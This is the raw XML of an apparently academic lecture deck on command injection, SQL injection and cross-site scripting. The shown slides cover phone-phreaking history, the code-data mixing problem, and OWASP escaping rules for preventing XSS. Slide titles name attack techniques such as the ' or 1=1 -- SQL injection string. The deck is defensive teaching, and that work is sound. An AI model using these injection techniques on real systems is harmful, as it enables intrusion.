              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;body&gt;...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;div&gt;...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The characters that affect XML parsing (&amp;, &gt;, &lt;, “, ‘, /) need to be escaped</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410105247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8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{35E076D3-6EFF-414E-903B-C527A6A0749F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525314" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Phone Phreaking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525315" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>John Draper became “Captain Crunch” and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>built </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>a blue box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The blue box produced a number of different tones that could be used for in-band signaling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Draper was eventually sentenced to five years’ probation for toll fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>His story became an integral part of hacker culture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343018785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253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253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2531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2531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Solutions to XSS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Rule 2: Attribute Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Common Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside unquoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These attributes can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"broken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using many characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside single-quoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These attributes can be broken only using the single quote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside double-quoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These attributes can be broken only using the double quote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234806429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Solutions to XSS</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RULE 3: JavaScript Escape Before Inserting Untrusted Data into HTML JavaScript Data Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside a quoted string: &lt;script&gt;alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside a quoted expression: &lt;script&gt;x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside a quoted event handler: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RULE 4: CSS Escape Before Inserting Untrusted Data into HTML Style Property Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;style&gt;selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } &lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;span style=property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...;&gt;text&lt;/style&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408602817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Solutions to XSS</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RULE 5: URL Escape Before Inserting Untrusted Data into HTML URL Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A normal link: &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&gt;link&lt;/a &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An image source: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...' /&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A script source: &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..." /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check out: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/XSS_(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cross_Site_Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172996625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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mixing of Code and Data is the root cause of many security vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178180090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Fundamental Problem: Mixing Code and Data</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The problem was that the phone network used sound frequencies to control the network on the same channel that carried voice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control frequencies: Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Voice: Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Captain Crunch and others found that they could mimic the control frequencies using just the voice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Therefore, they could trick the phone system to interpret their Data as Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19817065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Mixing Code and Data in Web Applications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Numerous areas where Code and Data are mixed in Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anywhere that strings are concatenated to produce output to another program/parser, possible problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201353234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42" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS Command Injection Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main problem: Incorrect (or complete lack of) validation of user input that results in the execution of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>external input to compose strings that are passed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that can evaluate code or include code from a file (language-specific)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>include()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>require()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428206528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7584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7584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7584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7584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7584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7584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7584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adam_seclab_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ln w="76200">
          <a:headEnd type="none"/>
          <a:tailEnd type="triangle"/>
        </a:ln>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126516</TotalTime>
  <Words>4310</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>485</Paragraphs>
  <Slides>63</Slides>
  <Notes>23</Notes>
  <HiddenSlides>5</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>63</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="64" baseType="lpstr">
      <vt:lpstr>adam_seclab_theme</vt:lpstr>
      <vt:lpstr>Command Injection Attacks</vt:lpstr>
      <vt:lpstr>Flashback to CPU Design</vt:lpstr>
      <vt:lpstr>What is the Difference?</vt:lpstr>
      <vt:lpstr>Mixing Code and Data</vt:lpstr>
      <vt:lpstr>Cap’n Crunch</vt:lpstr>
      <vt:lpstr>Phone Phreaking</vt:lpstr>
      <vt:lpstr>Fundamental Problem: Mixing Code and Data</vt:lpstr>
      <vt:lpstr>Mixing Code and Data in Web Applications</vt:lpstr>
      <vt:lpstr>OS Command Injection Attacks</vt:lpstr>
      <vt:lpstr>OS Command Injection Attacks</vt:lpstr>
      <vt:lpstr>Preventing OS Command Injection</vt:lpstr>
      <vt:lpstr>File Inclusion Attacks</vt:lpstr>
      <vt:lpstr>File Inclusion in PHP</vt:lpstr>
      <vt:lpstr>SQL Injection Example</vt:lpstr>
      <vt:lpstr>The Form</vt:lpstr>
      <vt:lpstr>The Login Script</vt:lpstr>
      <vt:lpstr>The Database</vt:lpstr>
      <vt:lpstr>The [' or 1=1 --] Technique</vt:lpstr>
      <vt:lpstr>Injecting SQL Into Different Types of Queries</vt:lpstr>
      <vt:lpstr>Inject Different Queries</vt:lpstr>
      <vt:lpstr>Identifying SQL Injection</vt:lpstr>
      <vt:lpstr>The UNION Operator</vt:lpstr>
      <vt:lpstr>Determining Number and Type of  Query Parameters</vt:lpstr>
      <vt:lpstr>Determining Table and Column Names</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Second Order SQL Injection</vt:lpstr>
      <vt:lpstr>register.php</vt:lpstr>
      <vt:lpstr>change_password.php</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions</vt:lpstr>
      <vt:lpstr>SQL Injection – Prevention</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions: Stored Procedures</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions: Stored Procedures</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions: Prepared Statements</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reflected Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Steal Login Data</vt:lpstr>
      <vt:lpstr>Reflected Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Simple XSS Example</vt:lpstr>
      <vt:lpstr>Stored Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Executing JavaScript</vt:lpstr>
      <vt:lpstr>DOM-based XSS</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Wormable XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Summary</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c:creator>
  <cp:lastModifiedBy>A</cp:lastModifiedBy>
  <cp:revision>3588</cp:revision>
  <cp:lastPrinted>2011-10-05T20:20:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-20T20:28:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-03-03T22:14:52Z</dcterms:modified>
</cp:coreProperties>
</file>